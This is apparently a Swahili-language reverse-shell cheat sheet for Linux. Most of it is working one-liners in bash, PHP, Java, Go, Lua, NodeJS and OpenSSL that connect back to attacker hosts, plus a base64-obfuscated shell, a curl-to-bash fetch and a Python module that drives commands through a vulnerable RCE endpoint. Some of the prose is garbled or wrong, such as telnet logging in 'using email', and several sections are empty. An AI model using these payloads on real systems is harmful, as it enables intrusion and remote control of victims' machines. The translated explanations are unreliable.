curlhttps://reverse-shell.sh/1.1.1.1:3000|bashbash-i>&/dev/tcp/<ATTACKER-IP>/<PORT>0>&1bash-i>&/dev/udp/127.0.0.1/42420>&1#UDP0<&196;exec196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh<&196>&1962>&196exec5<>/dev/tcp/<ATTACKER-IP>/<PORT>; whilereadline0<&5; do $line 2>&5>&5; done#Short and bypass (credits to Dikline)(sh)0>/dev/tcp/10.10.10.10/9091#after getting the previous shell to get the output to executeexec>&0
Usisahau kuangalia na mabaka mengine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash.
Baka Salama ya Alama
#If you need a more stable connection do:bash-c'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'#Stealthier method#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0echobm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK|base64-d|bash2>/dev/null
Maelezo ya Shell
bash -i: Sehemu hii ya amri inaanza kiendeshaji cha Bash cha mwingiliano (-i).
>&: Sehemu hii ya amri ni maelezo ya mkato kwa kupelekeza pato la kawaida (stdout) na makosa ya kawaida (stderr) kwa mahali sawa.
/dev/tcp/<ATTACKER-IP>/<PORT>: Hii ni faili maalum inayowakilisha unganisho la TCP kwa anwani ya IP iliyotajwa na bandari.
Kwa kupelekeza mito ya pato na makosa kwa faili hii, amri inatuma kimsingi pato la kikao cha kiendeshaji cha mwingiliano kwenye mashine ya mshambuliaji.
0>&1: Sehemu hii ya amri inapelekeza kuingia kawaida (stdin) kwa marudio sawa na pato la kawaida (stdout).
Wakati unashughulika na udhaifu wa Remote Code Execution (RCE) ndani ya programu ya wavuti inayotumia Linux, kufanikisha shell ya nyuma kunaweza kuzuiliwa na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti yenye utata. Katika mazingira hayo yaliyozuiwa, njia mbadala inahusisha kuanzisha shell ya PTY (Pseudo Terminal) ili kuingiliana na mfumo uliokumbwa na shida kwa ufanisi zaidi.
Zana iliyopendekezwa kwa kusudi hili ni toboggan, ambayo inasaidia kuingiliana na mazingira lengwa.
Kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyobinafsishwa kwa muktadha wa RCE wa mfumo wako lengwa. Kwa mfano, moduli iliyoitwa nix.py inaweza kuwa na muundo ufuatao:
import jwt
import httpx
def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)
response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)
# Check if the request was successful
response.raise_for_status()
return response.text
Na kisha, unaweza kukimbia:
toboggan-mnix.py-i
Kutumia kabisa ganda la kuingiliana moja kwa moja. Unaweza kuongeza -b kwa ushirikiano wa Burpsuite na kuondoa -i kwa ganda la rce la msingi zaidi.
Namna mzigo unavyotumwa (vichwa? data? habari ziada?)
Kisha, unaweza tu kutuma amri au hata kutumia amri ya upgrade kupata PTY kamili (kumbuka kuwa mabomba hufanyiwa kusoma na kuandika kwa kuchelewa kwa takriban sekunde 1.3).
Telnet ni itifaki ya mtandao inayotumiwa kwa mawasiliano kwenye mtandao. Inaweza kutumika kwa kuingia kwa mbali kwenye mfumo wa kompyuta au kifaa kingine kwa kutumia barua pepe.
Perl ni lugha ya programu ambayo inaweza kutumika kwa ufanisi kama shellcode kwenye mifumo ya Linux. Inaweza kutumika kwa kuchora sockets, kusoma na kuandika faili, na kufanya shughuli zingine za mfumo. Perl inaweza kuwa chaguo nzuri kwa kuandika shellcode kwa sababu ya uwezo wake wa kufanya kazi na strings na pointers kwa urahisi.
PHP ni lugha ya programu inayotumika sana kwa maendeleo ya wavuti. Inaweza kutumika kwa kujenga programu za seva zinazoweza kutekeleza amri za mfumo wa uendeshaji. Kwa kawaida, PHP inaweza kutekeleza amri za mfumo wa uendeshaji kwa kutumia shell_exec, exec, system, passthru, popen, proc_open, pcntl_exec, backticks, na shell functions. Kwa hivyo, PHP inaweza kutumika kama sehemu ya mnyororo wa shambulio la kuingilia kati kwa kutekeleza amri za mfumo wa uendeshaji.
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.// Using this method may lead to instances where the connection reaches out to the listener and then closes.php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'// Using 'proc_open' makes no assumptions about what the file descriptor will be.// See https://security.stackexchange.com/a/198944 for more information<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock), $pipes); ?><?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Java
r=Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Golang ni lugha ya programu iliyoundwa na Google. Inajulikana kwa ufanisi wake na urahisi wa matumizi.
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Lua
Lua
#Linuxlua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linuxlua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
NodeJS
(function(){var net =require("net"),cp =require("child_process"),sh =cp.spawn("/bin/sh", []);var client =newnet.Socket();client.connect(8080,"10.17.26.64",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents the Node.js application form crashing})();orrequire('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")or-var x =global.process.mainModule.require-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')or// If you get to the constructor of a function you can define and execute another function inside a string"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
or// Abuse this syntax to get a reverse shellvar fs =this.process.binding('fs');var fs =process.binding('fs');orhttps://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
OpenSSL
Mshambuliaji (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response
Mzigo
Kwa kawaida, unataka kudumisha upatikanaji wa shell kwenye mfumo wa kompyuta ya mwathiriwa. Kwa kufanya hivyo, unaweza kutekeleza hatua zaidi za mashambulizi. Kuna njia kadhaa za kupata shell kwenye mfumo wa mwathiriwa, ikiwa ni pamoja na:
Reverse Shells: Hizi ni aina za shell ambazo zinawezesha kompyuta ya mwathiriwa kuungana na kompyuta yako, badala ya kinyume chake.
Web Shells: Hizi ni programu ndogo zilizowekwa kwenye seva ya wavuti ambazo zinaweza kutumiwa kudhibiti mfumo wa kompyuta ya mwathiriwa kupitia kivinjari cha wavuti.
Local Shells: Hizi ni aina za shell ambazo zinapatikana moja kwa moja kwenye kompyuta ya mwathiriwa, mara nyingi kupitia udhibiti wa mbali.
Kila aina ya shell ina faida zake na inaweza kutumiwa kulingana na mazingira na malengo ya mashambulizi yako.
export X=Connected; whiletrue; do X=`eval $(finger "$X"@<IP>2>/dev/null')`; sleep 1; doneexport X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
Gawk
Gawk ni programu ya kutumia lugha ya Awk. Inaweza kutumika kama sehemu ya mnyororo wa zana za kufanya uchambuzi wa data kwenye mifumo ya Unix. Gawk inaweza kutumika kwa urahisi kwenye mstari wa amri kusaidia katika kuchuja, kuchambua, na kuchakata data kwa njia ya kiotomatiki.